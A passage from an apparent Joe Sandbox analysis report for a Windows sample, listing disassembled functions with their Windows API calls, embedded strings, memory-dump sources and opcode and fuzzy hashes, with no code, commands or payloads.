                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: __floor_pentium4
                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                            • API String ID: 4168288129-2761157908
                                                                                            • Opcode ID: 37603bb9d6a49458e178f11224242955df96e64d4a4392dd190c625489000770
                                                                                            • Instruction ID: 1d320d00437da780917be0f680a0a91a11e0f9c7e3b37d9ef24371a4629d04db
                                                                                            • Opcode Fuzzy Hash: 37603bb9d6a49458e178f11224242955df96e64d4a4392dd190c625489000770
                                                                                            • Instruction Fuzzy Hash: 91C21B71E046298FDB29CF289D407EAB7B5FB44306F1541EAD84DE7240E775AE898F40
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog_swprintf
                                                                                            • String ID: CMT$h%u$hc%u
                                                                                            • API String ID: 146138363-3282847064
                                                                                            • Opcode ID: e6928bcc90eab2cfcf8b27ce483ae9c096e50c6db4300d818a02c50e0346326c
                                                                                            • Instruction ID: 1a5e6dd1d62789621d403bff4302d4f4d90f03d712de24bcb2f0eb320c251c84
                                                                                            • Opcode Fuzzy Hash: e6928bcc90eab2cfcf8b27ce483ae9c096e50c6db4300d818a02c50e0346326c
                                                                                            • Instruction Fuzzy Hash: 8132E872514384AFDF18DF74C996BEA37A5AF15300F04447EFD8A9B282DB749A49CB20
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A32874
                                                                                            • _strlen.LIBCMT ref: 00A32E3F
                                                                                              • Part of subcall function 00A402BA: __EH_prolog.LIBCMT ref: 00A402BF
                                                                                              • Part of subcall function 00A41B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A3BAE9,00000000,?,?,?,00010426), ref: 00A41BA0
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A32F91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                            • String ID: CMT
                                                                                            • API String ID: 1206968400-2756464174
                                                                                            • Opcode ID: a9277711aa00be368e3d535104b4ba11175e66cf80e7bcb037c9c48e0b345240
                                                                                            • Instruction ID: 746a665997bd235c972322ab041fd536360d0586bee03fd3774d52e43ea1a265
                                                                                            • Opcode Fuzzy Hash: a9277711aa00be368e3d535104b4ba11175e66cf80e7bcb037c9c48e0b345240
                                                                                            • Instruction Fuzzy Hash: 0662F3726003448FDF19DF78C9867EA7BA1AF54300F08857EFC9A9B282DB759945CB60
                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00A4F844
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00A4F910
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A4F930
                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00A4F93A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                            • String ID:
                                                                                            • API String ID: 254469556-0
                                                                                            • Opcode ID: 8b52ceb9acb2fabc1a7dd23682e3a33473893241c57f558fee0d4c5c0a51a834
                                                                                            • Instruction ID: 4e29ae1d37e84260bccc895dbe619f785d07f61ef87d657ffc615055d1af166f
                                                                                            • Opcode Fuzzy Hash: 8b52ceb9acb2fabc1a7dd23682e3a33473893241c57f558fee0d4c5c0a51a834
                                                                                            • Instruction Fuzzy Hash: 48312779D052199FDF20DFA4D989BCCBBB8AF08304F1051AAE50CAB250EB759B858F44
                                                                                            APIs
                                                                                            • VirtualQuery.KERNEL32(80000000,00A4E5E8,0000001C,00A4E7DD,00000000,?,?,?,?,?,?,?,00A4E5E8,00000004,00A91CEC,00A4E86D), ref: 00A4E6B4
                                                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00A4E5E8,00000004,00A91CEC,00A4E86D), ref: 00A4E6CF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoQuerySystemVirtual
                                                                                            • String ID: D
                                                                                            • API String ID: 401686933-2746444292
                                                                                            • Opcode ID: fb414d6d7d04d0dc1acd6993a3c52bfcfcd92eac36ebdf40d7077fa44f3544e7
                                                                                            • Instruction ID: 8dbe957ae30b0959922652fbeb494c3cfff3a2777c5dd4e6829c0a953d3be647
                                                                                            • Opcode Fuzzy Hash: fb414d6d7d04d0dc1acd6993a3c52bfcfcd92eac36ebdf40d7077fa44f3544e7
                                                                                            • Instruction Fuzzy Hash: 8401D476600109ABDF14DF69DC09AED7BAABFC4328F0CC220ED19D6150D734D9068680
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A58FB5
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A58FBF
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00A58FCC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 4338143c6e98b3e3749b4cff3defaf48c5826f12ac8120be8a66141e58de61bb
                                                                                            • Instruction ID: 745609769d7f124d44f9601d0493a7aec45804988d0c0c77cb231fa96ea45d7b
                                                                                            • Opcode Fuzzy Hash: 4338143c6e98b3e3749b4cff3defaf48c5826f12ac8120be8a66141e58de61bb
                                                                                            • Instruction Fuzzy Hash: E731D8759012189BCF21DF68DD8979CBBB4BF48311F5041EAE81CA7250EB749F858F54
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                            • Instruction ID: f024af3494d46b33da4af5ce71adea56285db12cb4ef851c3eef6885d85c9961
                                                                                            • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                            • Instruction Fuzzy Hash: DB021C71E002199FDF24CFA9C9806ADB7F1FF88315F258269D919EB384D731AA45CB90
                                                                                            APIs
                                                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A4AF35
                                                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,00A6E72C,?,?), ref: 00A4AF84
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatInfoLocaleNumber
                                                                                            • String ID:
                                                                                            • API String ID: 2169056816-0
                                                                                            • Opcode ID: 13a2a86471cb0f8a0bde2b8a4fdc7c0fce953a91079b5106516d6ce75fe51c4c
                                                                                            • Instruction ID: b53dac8a5c2318d69e563d4466cdeb732ee53c2d144c6acb721a55c2b297c1a3
                                                                                            • Opcode Fuzzy Hash: 13a2a86471cb0f8a0bde2b8a4fdc7c0fce953a91079b5106516d6ce75fe51c4c
                                                                                            • Instruction Fuzzy Hash: 61017C7A100309BEDB10DFA5EC45F9A77BCEF49711F404422FA05AB190E3B0AA16CBA5
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00A36DDF,00000000,00000400), ref: 00A36C74
                                                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00A36C95
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFormatLastMessage
                                                                                            • String ID:
                                                                                            • API String ID: 3479602957-0
                                                                                            APIs
                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A619EF,?,?,00000008,?,?,00A6168F,00000000), ref: 00A61C21
                                                                                            Similarity
                                                                                            • API ID: ExceptionRaise
                                                                                            • String ID:
                                                                                            • API String ID: 3997070919-0
                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00A4F66A
                                                                                            Similarity
                                                                                            • API ID: FeaturePresentProcessor
                                                                                            • String ID:
                                                                                            • API String ID: 2325560087-0
                                                                                            APIs
                                                                                            • GetVersionExW.KERNEL32(?), ref: 00A3B16B
                                                                                            Similarity
                                                                                            • API ID: Version
                                                                                            • String ID:
                                                                                            • API String ID: 1889659487-0
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: gj
                                                                                            • API String ID: 0-4203073231
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00A4F3A5), ref: 00A4F9DA
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: HeapProcess
                                                                                            • String ID:
                                                                                            • API String ID: 54951025-0
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f24767591d4166fdd23e8e493ff13d911842074e91e8ce94689378ec040f900
                                                                                            • Instruction ID: 6a2c0f2f2f836891e929933e6ba005816481c76db8f946c53f3f6f0691cdd99b
                                                                                            • Opcode Fuzzy Hash: 9f24767591d4166fdd23e8e493ff13d911842074e91e8ce94689378ec040f900
                                                                                            • Instruction Fuzzy Hash: F6F18A71A083118FC758CF29C98462ABBE5FFCA324F155A2EF4C5A7256D730E945CB42
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            APIs
                                                                                            • _swprintf.LIBCMT ref: 00A3E30E
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                              • Part of subcall function 00A41DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00A71030,00000200,00A3D928,00000000,?,00000050,00A71030), ref: 00A41DC4
                                                                                            • _strlen.LIBCMT ref: 00A3E32F
                                                                                            • SetDlgItemTextW.USER32(?,00A6E274,?), ref: 00A3E38F
                                                                                            • GetWindowRect.USER32(?,?), ref: 00A3E3C9
                                                                                            • GetClientRect.USER32(?,?), ref: 00A3E3D5
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00A3E475
                                                                                            • GetWindowRect.USER32(?,?), ref: 00A3E4A2
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00A3E4DB
                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00A3E4E3
                                                                                            • GetWindow.USER32(?,00000005), ref: 00A3E4EE
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00A3E51B
                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00A3E58D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                            • String ID: $%s:$CAPTION$d
                                                                                            • API String ID: 2407758923-2512411981
                                                                                            • Opcode ID: 137068987809aa9affd7c6764ea87c9d367b8a938f933885186079495a5cc13f
                                                                                            • Instruction ID: a5651c255e3929e747a51754e36137cff61afbf732cc2795a6ed763671fdd7d5
                                                                                            • Opcode Fuzzy Hash: 137068987809aa9affd7c6764ea87c9d367b8a938f933885186079495a5cc13f
                                                                                            • Instruction Fuzzy Hash: 4B818172608301AFDB10DFA8CD89A6FBBF9FBC9704F04091DFA8497290D671E9058B52
                                                                                            APIs
                                                                                            • ___free_lconv_mon.LIBCMT ref: 00A5CB66
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C71E
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C730
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C742
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C754
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C766
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C778
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C78A
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C79C
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7AE
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7C0
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7D2
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7E4
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7F6
                                                                                            • _free.LIBCMT ref: 00A5CB5B
                                                                                              • Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
                                                                                              • Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4
                                                                                            • _free.LIBCMT ref: 00A5CB7D
                                                                                            • _free.LIBCMT ref: 00A5CB92
                                                                                            • _free.LIBCMT ref: 00A5CB9D
                                                                                            • _free.LIBCMT ref: 00A5CBBF
                                                                                            • _free.LIBCMT ref: 00A5CBD2
                                                                                            • _free.LIBCMT ref: 00A5CBE0
                                                                                            • _free.LIBCMT ref: 00A5CBEB
                                                                                            • _free.LIBCMT ref: 00A5CC23
                                                                                            • _free.LIBCMT ref: 00A5CC2A
                                                                                            • _free.LIBCMT ref: 00A5CC47
                                                                                            • _free.LIBCMT ref: 00A5CC5F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                            • String ID:
                                                                                            • API String ID: 161543041-0
                                                                                            • Opcode ID: 3cf5ccda5d75f8e686a642673f10b6a1324ecfb29a856519d3a29455c11caade
                                                                                            • Instruction ID: d7fdb312e231c5442b170847c1f1d5219db112e165f33d76836505d7fe72235e
                                                                                            • Opcode Fuzzy Hash: 3cf5ccda5d75f8e686a642673f10b6a1324ecfb29a856519d3a29455c11caade
                                                                                            • Instruction Fuzzy Hash: 9B313E326003099FEB21AB38D946B5A77F9FF10722F155419E958E7196DF39EC88CB10
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 00A49736
                                                                                            • _wcslen.LIBCMT ref: 00A497D6
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00A497E5
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00A49806
                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A4982D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                            • API String ID: 1777411235-4209811716
                                                                                            • Opcode ID: 9f9a7bd79882fd75c3b8225a94ba31284df75a46203c1b9707c5cfe3b4d32e56
                                                                                            • Instruction ID: 0ae3ec852b6ee2ae0020a28fba334d9a6a731bc7a37926fa4da0ce0f8105bf92
                                                                                            • Opcode Fuzzy Hash: 9f9a7bd79882fd75c3b8225a94ba31284df75a46203c1b9707c5cfe3b4d32e56
                                                                                            • Instruction Fuzzy Hash: 1C3128365083017AEB25AF749C06F6F77E8AFC2321F14051EF901961D2EB749A1983A6
                                                                                            APIs
                                                                                            • GetWindow.USER32(?,00000005), ref: 00A4D6C1
                                                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 00A4D6ED
                                                                                              • Part of subcall function 00A41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00A3C116,00000000,.exe,?,?,00000800,?,?,?,00A48E3C), ref: 00A41FD1
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00A4D709
                                                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00A4D720
                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00A4D734
                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00A4D75D
                                                                                            • DeleteObject.GDI32(00000000), ref: 00A4D764
                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00A4D76D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
